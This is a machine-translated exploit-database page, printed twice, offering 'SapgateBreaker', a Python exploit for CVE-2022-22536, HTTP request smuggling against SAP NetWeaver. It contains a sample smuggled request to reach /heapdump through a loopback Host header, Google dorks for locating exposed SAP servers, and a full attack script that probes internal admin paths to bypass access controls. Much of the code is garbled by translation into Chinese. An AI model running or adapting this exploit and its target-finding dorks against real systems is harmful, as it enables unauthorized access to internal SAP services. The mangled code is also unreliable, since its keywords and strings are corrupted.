#利用标题: SapgateBreaker漏洞利用-CVE -2022-22536 -HTTP请求在SAP的前门中走私
#Google Dork: https://github.com/becodoexploit-mrcat/sapgatebreaker-exploit/blob/main/main/dorks
#date: 2025年4月2日,星期二
#漏洞作者: @c41tx90 -Victor de Queiroz -Beco Do exploit- Elytron Security
#供应商homepage3360 https://community.sap.com/t5/techno...diation/remediation-of-cve-2022-22536-request splyquest smuggling-and-requling-and-request-concatenation/
#软件link: https://help.sap.com/docs/support_content/uiwits/3361892375.html
#版本: SAP NetWeaver应用程序服务器ABAP,SAP NetWeaver
应用程序服务器Java,ABAP平台,SAP Content Server 7.53和
SAP Web调度程序
#在: Red Hat Enterprise Linux(RHEL)上测试
#CVE : 2022-22536
-------
SapgateBreaker-CVE-2022-22536 HTTP请求走私者
作者: @c41tx90 -Victor de Queiroz | Elytronsecurity.com |
becodoexploit.com
---------------------------------------------------------------------------------------------------------------------------
Target: SAP NetWeaver应用程序服务器
漏洞: CVE-2022-22536
利用类型: HTTP请求走私(基于内容长度)
Impact: ACL旁路,内部访问
更多信息和说明:
---------------------------------------------------------------------------------------------------------------------------
样本有效:
---------------------------------------------------------------------------------------------------------------------------
get/sap/admin/public/default.html http/1.1
HOST: 172.32.22.7:50000
用户- 代理: mozilla/5.0(x11; ubuntu; linux x86_64; rv3:136.0)
壁虎/20100101 Firefox/136.0
ACCEPT:应用程序/JSON,text/javaScript, /; Q=0.01
Accept-Language: en-us,en; q=0.5
Accept-incoding: Gzip,Deflate,br
Referer: http://172.32.22.7:50000/sap/admin/public/public/default.html
X-重新要求- WITH: XMLHTTPREQUEST
Connection:保持空白
Cookie: SAPLB _*=(J2EE7364720)7364750
授权:基本YTPH
内容长度: 89
0 \ r
\ r
获取/heapDump/http/1.1 \ r
HOST: 127.0.0.1 \ r
x-forwarded-for: 127.0.0.1 \ r
\ r
---------------------------------------------------------------------------------------------------------------------------
预期响应:
---------------------------------------------------------------------------------------------------------------------------
http/1.1 200好
Server: SAP NetWeaver应用程序服务器
Last-Modified: Tue,01 Sep 2020 11:54:39 GMT
SAP-CACHE-CORTROL: +3600
日期: TUE,2025年4月1日2033333333:02 GMT
内容长度: 4465
content-type:文本/html
Connection:保持空白
X-DUMMY: 0
---------------------------------------------------------------------------------------------------------------------------
成功指标:
示例路径测试:
SAP NetWeaver Application Server ABAP,SAP NetWeaver应用程序服务器Java,ABAP平台,SAP Content Server 7.53和SAP Web Dispatcher对于请求走私和请求串联非常容易受到攻击。未经验证的攻击者可以用任意数据准备受害者的请求。这样,攻击者可以执行模拟受害者或中毒中间网络缓存的功能。成功的攻击可能会导致系统的机密性,完整性和可用性的完全妥协。
Google Dorks:
Intitle:'SAP NetWeaver应用程序服务器Java'inurl:/webdynpro/resources/
Intitle:'SAP NetWeaver''SAP J2EE引擎'
Intitle:'welcome to sap netweaver'Inurl:/irj/portal
Intitle3:'SAP NetWeaver管理员'inurl:/nwa
inurl:'/sap/bc/webdynpro'-site:sap.com
inurl:'/sap/public''sap netweaver'
inurl:'/sap/admin/public/default.html'
inurl:'/webdynpro/welcome/welcome.html'
inurl:'/sap/public/info.jsp'
“由SAP NetWeaver供电” Inurl:SAP
Intitle:'SAP Web调度器管理'
---------------------------------------------------------------------------------------------------------------------------
# 开发
导入argparse
导入http.client
来自urllib.parse导入urlparse
从Colorama进口,风格,背部,初始
导入操作系统
init(autoret=true)
横幅=f'''
{Fore.White}
+------------------------------------------+
(\ __/\打破门|
{style.bright} {fore.white}的{style.Reset_all}
{fore.yellow }@c41tx90 {fore.white} |
({{fore.red}•{fore.white}デ{fore.red}•{fore.white})
{style.bright} {fore.yellow} cve-2022-22536 {style.reset_all} |
{fore.green} t.me/becodoxpl {fore.white} |
/つ{fore.white} http请求走私者|
{fore.yellow} becodoeexploit.com {fore.white} |
|
{fore.lightblue_ex} erlytronsecurity.com {fore.white} |
+------------------------------------------+
'''
def detect_sap_version(主机,端口,is_https):
TRY:
conn_class=http.client.httpsconnection如果IS_HTTPS else
http.client.httpconnection
conn=conn_class(主机,端口,超时=5)
conn.request('get','/')
res=conn.getResponse()
标题={k.lower(): V for K,v in Res.geTheaders()}
server_header=headers.get('服务器','未知')
print(f'{fore.yellow} [*] {fore.white}检测到SAP服务器
header: {fore.cyan} {server_header} \ n')
返回server_header
除异常外,E:
print(f'{fore.red} [!] {fore.white}无法确定SAP
版本: {e} \ n')
返回“未知”
def build_smuggled_request(路径):
返回f'0 \ r \ n \ r \ nget {path} http/1.1 \ r \ r \ nhost:
127.0.0.1 \ r \ r \ nx-forwarded-for: 127.0.0.0.1 \ r \ nConnection: Close \ r \ r \ n \ r \ r \ n'
def try_file_read(主机,端口,is_https,冗长):
test_paths=[
'/sap/public/bc/icf/info',
'/sap/public/info.jsp',
'/sap/public/test/test.jsp',
'/sap/bc/webdynpro/sap/appl_soap_management',
'/sap/public/bc/soap/rfc',
'/webdynpro/welcome/welcome.html',
'/sr_central',
'/useradmin/.jsp',
'/heapdump/',
'/startpage',
'/crossdomain.xml',
'/ctc/configservlet',
'/webdynpro/resources/sap.com/tc~lm~config~content/',
'/sld',
'/sap/bc/webdynpro/sap/wdy_cfg_component_config',
'/sap/public/bc/icf/logon.html',
'/sap/bc/webdynpro/sap/itadmin',
'/sap/public/bc/sec/saml2',
'/sap/public/bc/webdav'
这是给出的
print(f'{style.bright} {fore.red} [!] {fore.white}概念证明
对于ACL旁路,通过http请求走私{style.reset_all} \ n')
对于test_paths:中的路径
TRY:
conn_class=http.client.httpsconnection如果IS_HTTPS else
http.client.httpconnection
conn=conn_class(主机,端口)
conn.request('get',路径)
res_direct=conn.getResponse()
content_direct=res_direct.read()。decode(errors='nignore')
direct_status=res_direct.status
除异常外,E:
print(f'{fore.red} [!] {fore.white}错误检查直接检查
{path} : {e}'的访问
继续
body=build_smuggled_request(路径)
标题={
'host': f'{host} : {port}',
“授权” :'基本ytph',
'cookie':'saplb _*=(J2EE7364720)7364750',
'content-type':'应用程序/json',
'content-Length': str(len(body.encode('utf-8')))
}
TRY:
conn=conn_class(主机,端口)
conn.request('post','/sap/admin/public/default.html',
身体=身体,标头=标题)
res=conn.getResponse()
smuggled_headers=res.getheaders()
content_smuggled=res.read()。解码(errors='忽略')
smuggled_status=res.status
status_color=fore.green如果smuggled_status!=
direct_status else fore
print(f'{status_color} [ - ] {fore.lightblue_ex} {path}
{style.bright} {fore.white}直接访问:
{fore.yellow}({direct_status}){fore.white}走私Access:
{status_color}({smuggled_status}){style.Reset_all}')
如果smuggled_status==direct_status:
print(f'{fore.red} [x] {fore.white}漏洞不起作用
对于{path} \ n')
以F:为open('poc.txt','a')
f.write(f'\ n-- path: {path} --- \ n')
f.Write(f'direct: {direct_status} \ nsmuggled:
{smuggled_status} \ n')
f.Write(f'sMuggled request: \ npost
/sap/admin/public/default.html http/1.1 \ n')
对于k,v in Headers.items():
f.write(f'{k} : {v} \ n')
f.write(f'\ n {body} \ n')
f.Write(f'sMuggled响应标题: \ n')
对于smuggled_headers:中的h
f.write(f'{h [0]} : {h [1]} \ n')
如果有词:
f.write(f'\ nsmuggled响应body: \ n {content_smuggled} \ n')
f.write(f'\ ndirect响应: \ n {content_direct} \ n')
如果有词:
打印(f'\ n {fore.blue}将有效载荷发送到
{路径} : {style.Reset_all}')
打印(f'{fore.cyan}帖子
/sap/admin/public/default.html http/1.1')
对于k,v in Headers.items():
print(f'{fore.cyan} {k} : {v}')
print(f'\ n {fore.magenta} {body.strip()} {style.Reset_all} \ n')
print(f'{fore.blue}收到响应: {style.reset_all}')
print(f'{back.yellow如果smuggled_status==500
否则fore.cyan} {fore.white} http/1.1
{smuggled_status} {style.Reset_all}')
对于smuggled_headers:中的h
print(f'{fore.cyan} {h [0]} : {h [1]}')
print(f'\ n {fore.cyan} {content_smuggled} {style.reset_all}')
除异常外,E:
print(f'{fore.red} [!] {fore.white}错误走私到{path} : {e}')
def send_smuggled_request(目标,详细):
解析=urlparse(目标)
is_https=parsed.scheme=='https'
端口=解析或(443如果IS_HTTPS其他80)
主机=解析
印刷(横幅)
print(f'{fore.yellow} [*] {fore.white}开始CVE-2022-22536
{host} : {port} \ n')的开发
detect_sap_version(主机,端口,is_https)
body=build_smuggled_request('/sap/bc/webdynpro/sap/appl_soap_management')
标题={
'host': f'{host} : {port}',
“授权” :'基本ytph',
'cookie':'saplb _*=(J2EE7364720)7364750',
'content-type':'应用程序/json',
'content-Length': str(len(body.encode('utf-8')))
}
conn_class=http.client.httpsconnection如果IS_HTTPS else
http.client.httpconnection
conn=conn_class(主机,端口)
TRY:
conn.request('post','/sap/admin/public/default.html',
身体=身体,标头=标题)
res=conn.getResponse()
content=res.read()。解码(errors='忽略')
status_display=f'http/{res.version/10:1f} {res.status} {res.reason}'
is_exploit_success=res.status在[200,500,403,302]
print(f'{fore.green if is_exploit_success else refore.red} [ - ]
{Fore.White}如果IS_EXPLOIT_SUCCESS,则执行{'成功'执行{'成功'
别的''}! {Fore.yellow} CVE-2022-22536')
print(f'{fore.white} {' - '*60} \ n')
print(f'{fore.blue}发送payload: {style.reset_all}')
print(f'{fore.cyan} post/sap/admin/public/default.html http/1.1')
对于k,v in Headers.items():
print(f'{fore.cyan} {k} : {v}')
print(f'\ n {fore.magenta} {body.strip()} {style.Reset_all} \ n')
print(f'{fore.blue}收到响应: {style.reset_all}')
print(f'{back.yellow if res.status==500 else else
fore.cyan} {fore.white} {status_display} {style.reset_all}')
对于res.getheaders():
print(f'{fore.cyan} {h [0]} : {h [1]}')
如果有词:
print(f'\ n {fore.cyan} {content} {style.Reset_all}')
以F:为open(poc.txt','w')
f.Write(f'Initial request: \ npost
/sap/admin/public/default.html http/1.1 \ n')
对于k,v in Headers.items():
f.write(f'{k} : {v} \ n')
f.write(f'\ n {body} \ n')
f.write(f'Initial响应: \ n {status_display} \ n')
对于res.getheaders():
f.write(f'{h [0]} : {h [1]} \ n')
f.write(f'\ n {content} \ n')
打印('\ n')
如果IS_EXPLOIT_SUCCESS:
print(f'{fore.green} [=] {fore.white}执行的利用
成功并触发了内部处理行为。这
表示潜在的HTTP请求走私条件。”)
其他:
print(f'{fore.red} [x] {fore.white} exploit没有
触发预期行为。目标可能不容易受到伤害。”)
打印(f'\ n {fore.white} {' - '*60} \ n')
try_file_read(主机,端口,is_https,冗长)
除异常外,E:
print(f'{fore.red} [!] {fore.white}错误发送初始request: {e}')
def main():
Parser=argparse.argumentParser(Description='CVE-2022-22536走私POC')
parser.add_argument(' - u',' - url',必需=true,help='target
完整URL(例如http://Host
ort)')
parser.add_argument(' - 详细','-v',action='store_true',
help='显示完整的标题和响应')
args=parser.parse_args()
OS.System('clear')
send_smuggled_request(args.url,args.verbose)
如果name=='__ -Main __':
主要的()
---------------------------------------------------------------------------------------------------------------------------
#Google Dork: https://github.com/becodoexploit-mrcat/sapgatebreaker-exploit/blob/main/main/dorks
#date: 2025年4月2日,星期二
#漏洞作者: @c41tx90 -Victor de Queiroz -Beco Do exploit- Elytron Security
#供应商homepage3360 https://community.sap.com/t5/techno...diation/remediation-of-cve-2022-22536-request splyquest smuggling-and-requling-and-request-concatenation/
#软件link: https://help.sap.com/docs/support_content/uiwits/3361892375.html
#版本: SAP NetWeaver应用程序服务器ABAP,SAP NetWeaver
应用程序服务器Java,ABAP平台,SAP Content Server 7.53和
SAP Web调度程序
#在: Red Hat Enterprise Linux(RHEL)上测试
#CVE : 2022-22536
正在加载...
github.com
SapgateBreaker-CVE-2022-22536 HTTP请求走私者
作者: @c41tx90 -Victor de Queiroz | Elytronsecurity.com |
becodoexploit.com
---------------------------------------------------------------------------------------------------------------------------
Target: SAP NetWeaver应用程序服务器
漏洞: CVE-2022-22536
利用类型: HTTP请求走私(基于内容长度)
Impact: ACL旁路,内部访问
更多信息和说明:
正在加载...
github.com
样本有效:
---------------------------------------------------------------------------------------------------------------------------
get/sap/admin/public/default.html http/1.1
HOST: 172.32.22.7:50000
用户- 代理: mozilla/5.0(x11; ubuntu; linux x86_64; rv3:136.0)
壁虎/20100101 Firefox/136.0
ACCEPT:应用程序/JSON,text/javaScript, /; Q=0.01
Accept-Language: en-us,en; q=0.5
Accept-incoding: Gzip,Deflate,br
Referer: http://172.32.22.7:50000/sap/admin/public/public/default.html
X-重新要求- WITH: XMLHTTPREQUEST
Connection:保持空白
Cookie: SAPLB _*=(J2EE7364720)7364750
授权:基本YTPH
内容长度: 89
0 \ r
\ r
获取/heapDump/http/1.1 \ r
HOST: 127.0.0.1 \ r
x-forwarded-for: 127.0.0.1 \ r
\ r
---------------------------------------------------------------------------------------------------------------------------
预期响应:
---------------------------------------------------------------------------------------------------------------------------
http/1.1 200好
Server: SAP NetWeaver应用程序服务器
Last-Modified: Tue,01 Sep 2020 11:54:39 GMT
SAP-CACHE-CORTROL: +3600
日期: TUE,2025年4月1日2033333333:02 GMT
内容长度: 4465
content-type:文本/html
Connection:保持空白
X-DUMMY: 0
---------------------------------------------------------------------------------------------------------------------------
成功指标:
- 状态代码200的内部终点
- 直接访问(403/404)和走私(200)之间的差异
- 通过环回注射访问其他受限制的SAP服务
示例路径测试:
- /sap/public/bc/icf/info
- /sap/bc/webdynpro/sap/appl_soap_management
- /heapdump /
- /ctc /configservlet
- /sap/public/bc/icf/logon.html
- /webdynpro/resources/sap.com/tc~lm~config~content/
SAP NetWeaver Application Server ABAP,SAP NetWeaver应用程序服务器Java,ABAP平台,SAP Content Server 7.53和SAP Web Dispatcher对于请求走私和请求串联非常容易受到攻击。未经验证的攻击者可以用任意数据准备受害者的请求。这样,攻击者可以执行模拟受害者或中毒中间网络缓存的功能。成功的攻击可能会导致系统的机密性,完整性和可用性的完全妥协。
Google Dorks:
Intitle:'SAP NetWeaver应用程序服务器Java'inurl:/webdynpro/resources/
Intitle:'SAP NetWeaver''SAP J2EE引擎'
Intitle:'welcome to sap netweaver'Inurl:/irj/portal
Intitle3:'SAP NetWeaver管理员'inurl:/nwa
inurl:'/sap/bc/webdynpro'-site:sap.com
inurl:'/sap/public''sap netweaver'
inurl:'/sap/admin/public/default.html'
inurl:'/webdynpro/welcome/welcome.html'
inurl:'/sap/public/info.jsp'
“由SAP NetWeaver供电” Inurl:SAP
Intitle:'SAP Web调度器管理'
---------------------------------------------------------------------------------------------------------------------------
# 开发
导入argparse
导入http.client
来自urllib.parse导入urlparse
从Colorama进口,风格,背部,初始
导入操作系统
init(autoret=true)
横幅=f'''
{Fore.White}
+------------------------------------------+
(\ __/\打破门|
{style.bright} {fore.white}的{style.Reset_all}
{fore.yellow }@c41tx90 {fore.white} |
({{fore.red}•{fore.white}デ{fore.red}•{fore.white})
{style.bright} {fore.yellow} cve-2022-22536 {style.reset_all} |
{fore.green} t.me/becodoxpl {fore.white} |
/つ{fore.white} http请求走私者|
{fore.yellow} becodoeexploit.com {fore.white} |
|
{fore.lightblue_ex} erlytronsecurity.com {fore.white} |
+------------------------------------------+
'''
def detect_sap_version(主机,端口,is_https):
TRY:
conn_class=http.client.httpsconnection如果IS_HTTPS else
http.client.httpconnection
conn=conn_class(主机,端口,超时=5)
conn.request('get','/')
res=conn.getResponse()
标题={k.lower(): V for K,v in Res.geTheaders()}
server_header=headers.get('服务器','未知')
print(f'{fore.yellow} [*] {fore.white}检测到SAP服务器
header: {fore.cyan} {server_header} \ n')
返回server_header
除异常外,E:
print(f'{fore.red} [!] {fore.white}无法确定SAP
版本: {e} \ n')
返回“未知”
def build_smuggled_request(路径):
返回f'0 \ r \ n \ r \ nget {path} http/1.1 \ r \ r \ nhost:
127.0.0.1 \ r \ r \ nx-forwarded-for: 127.0.0.0.1 \ r \ nConnection: Close \ r \ r \ n \ r \ r \ n'
def try_file_read(主机,端口,is_https,冗长):
test_paths=[
'/sap/public/bc/icf/info',
'/sap/public/info.jsp',
'/sap/public/test/test.jsp',
'/sap/bc/webdynpro/sap/appl_soap_management',
'/sap/public/bc/soap/rfc',
'/webdynpro/welcome/welcome.html',
'/sr_central',
'/useradmin/.jsp',
'/heapdump/',
'/startpage',
'/crossdomain.xml',
'/ctc/configservlet',
'/webdynpro/resources/sap.com/tc~lm~config~content/',
'/sld',
'/sap/bc/webdynpro/sap/wdy_cfg_component_config',
'/sap/public/bc/icf/logon.html',
'/sap/bc/webdynpro/sap/itadmin',
'/sap/public/bc/sec/saml2',
'/sap/public/bc/webdav'
这是给出的
print(f'{style.bright} {fore.red} [!] {fore.white}概念证明
对于ACL旁路,通过http请求走私{style.reset_all} \ n')
对于test_paths:中的路径
TRY:
conn_class=http.client.httpsconnection如果IS_HTTPS else
http.client.httpconnection
conn=conn_class(主机,端口)
conn.request('get',路径)
res_direct=conn.getResponse()
content_direct=res_direct.read()。decode(errors='nignore')
direct_status=res_direct.status
除异常外,E:
print(f'{fore.red} [!] {fore.white}错误检查直接检查
{path} : {e}'的访问
继续
body=build_smuggled_request(路径)
标题={
'host': f'{host} : {port}',
“授权” :'基本ytph',
'cookie':'saplb _*=(J2EE7364720)7364750',
'content-type':'应用程序/json',
'content-Length': str(len(body.encode('utf-8')))
}
TRY:
conn=conn_class(主机,端口)
conn.request('post','/sap/admin/public/default.html',
身体=身体,标头=标题)
res=conn.getResponse()
smuggled_headers=res.getheaders()
content_smuggled=res.read()。解码(errors='忽略')
smuggled_status=res.status
status_color=fore.green如果smuggled_status!=
direct_status else fore
print(f'{status_color} [ - ] {fore.lightblue_ex} {path}
{style.bright} {fore.white}直接访问:
{fore.yellow}({direct_status}){fore.white}走私Access:
{status_color}({smuggled_status}){style.Reset_all}')
如果smuggled_status==direct_status:
print(f'{fore.red} [x] {fore.white}漏洞不起作用
对于{path} \ n')
以F:为open('poc.txt','a')
f.write(f'\ n-- path: {path} --- \ n')
f.Write(f'direct: {direct_status} \ nsmuggled:
{smuggled_status} \ n')
f.Write(f'sMuggled request: \ npost
/sap/admin/public/default.html http/1.1 \ n')
对于k,v in Headers.items():
f.write(f'{k} : {v} \ n')
f.write(f'\ n {body} \ n')
f.Write(f'sMuggled响应标题: \ n')
对于smuggled_headers:中的h
f.write(f'{h [0]} : {h [1]} \ n')
如果有词:
f.write(f'\ nsmuggled响应body: \ n {content_smuggled} \ n')
f.write(f'\ ndirect响应: \ n {content_direct} \ n')
如果有词:
打印(f'\ n {fore.blue}将有效载荷发送到
{路径} : {style.Reset_all}')
打印(f'{fore.cyan}帖子
/sap/admin/public/default.html http/1.1')
对于k,v in Headers.items():
print(f'{fore.cyan} {k} : {v}')
print(f'\ n {fore.magenta} {body.strip()} {style.Reset_all} \ n')
print(f'{fore.blue}收到响应: {style.reset_all}')
print(f'{back.yellow如果smuggled_status==500
否则fore.cyan} {fore.white} http/1.1
{smuggled_status} {style.Reset_all}')
对于smuggled_headers:中的h
print(f'{fore.cyan} {h [0]} : {h [1]}')
print(f'\ n {fore.cyan} {content_smuggled} {style.reset_all}')
除异常外,E:
print(f'{fore.red} [!] {fore.white}错误走私到{path} : {e}')
def send_smuggled_request(目标,详细):
解析=urlparse(目标)
is_https=parsed.scheme=='https'
端口=解析或(443如果IS_HTTPS其他80)
主机=解析
印刷(横幅)
print(f'{fore.yellow} [*] {fore.white}开始CVE-2022-22536
{host} : {port} \ n')的开发
detect_sap_version(主机,端口,is_https)
body=build_smuggled_request('/sap/bc/webdynpro/sap/appl_soap_management')
标题={
'host': f'{host} : {port}',
“授权” :'基本ytph',
'cookie':'saplb _*=(J2EE7364720)7364750',
'content-type':'应用程序/json',
'content-Length': str(len(body.encode('utf-8')))
}
conn_class=http.client.httpsconnection如果IS_HTTPS else
http.client.httpconnection
conn=conn_class(主机,端口)
TRY:
conn.request('post','/sap/admin/public/default.html',
身体=身体,标头=标题)
res=conn.getResponse()
content=res.read()。解码(errors='忽略')
status_display=f'http/{res.version/10:1f} {res.status} {res.reason}'
is_exploit_success=res.status在[200,500,403,302]
print(f'{fore.green if is_exploit_success else refore.red} [ - ]
{Fore.White}如果IS_EXPLOIT_SUCCESS,则执行{'成功'执行{'成功'
别的''}! {Fore.yellow} CVE-2022-22536')
print(f'{fore.white} {' - '*60} \ n')
print(f'{fore.blue}发送payload: {style.reset_all}')
print(f'{fore.cyan} post/sap/admin/public/default.html http/1.1')
对于k,v in Headers.items():
print(f'{fore.cyan} {k} : {v}')
print(f'\ n {fore.magenta} {body.strip()} {style.Reset_all} \ n')
print(f'{fore.blue}收到响应: {style.reset_all}')
print(f'{back.yellow if res.status==500 else else
fore.cyan} {fore.white} {status_display} {style.reset_all}')
对于res.getheaders():
print(f'{fore.cyan} {h [0]} : {h [1]}')
如果有词:
print(f'\ n {fore.cyan} {content} {style.Reset_all}')
以F:为open(poc.txt','w')
f.Write(f'Initial request: \ npost
/sap/admin/public/default.html http/1.1 \ n')
对于k,v in Headers.items():
f.write(f'{k} : {v} \ n')
f.write(f'\ n {body} \ n')
f.write(f'Initial响应: \ n {status_display} \ n')
对于res.getheaders():
f.write(f'{h [0]} : {h [1]} \ n')
f.write(f'\ n {content} \ n')
打印('\ n')
如果IS_EXPLOIT_SUCCESS:
print(f'{fore.green} [=] {fore.white}执行的利用
成功并触发了内部处理行为。这
表示潜在的HTTP请求走私条件。”)
其他:
print(f'{fore.red} [x] {fore.white} exploit没有
触发预期行为。目标可能不容易受到伤害。”)
打印(f'\ n {fore.white} {' - '*60} \ n')
try_file_read(主机,端口,is_https,冗长)
除异常外,E:
print(f'{fore.red} [!] {fore.white}错误发送初始request: {e}')
def main():
Parser=argparse.argumentParser(Description='CVE-2022-22536走私POC')
parser.add_argument(' - u',' - url',必需=true,help='target
完整URL(例如http://Host
ort)')parser.add_argument(' - 详细','-v',action='store_true',
help='显示完整的标题和响应')
args=parser.parse_args()
OS.System('clear')
send_smuggled_request(args.url,args.verbose)
如果name=='__ -Main __':
主要的()
---------------------------------------------------------------------------------------------------------------------------
正在加载...
nvd.nist.gov
正在加载...
launchpad.support.sap.com
正在加载...
blogs.sap.com
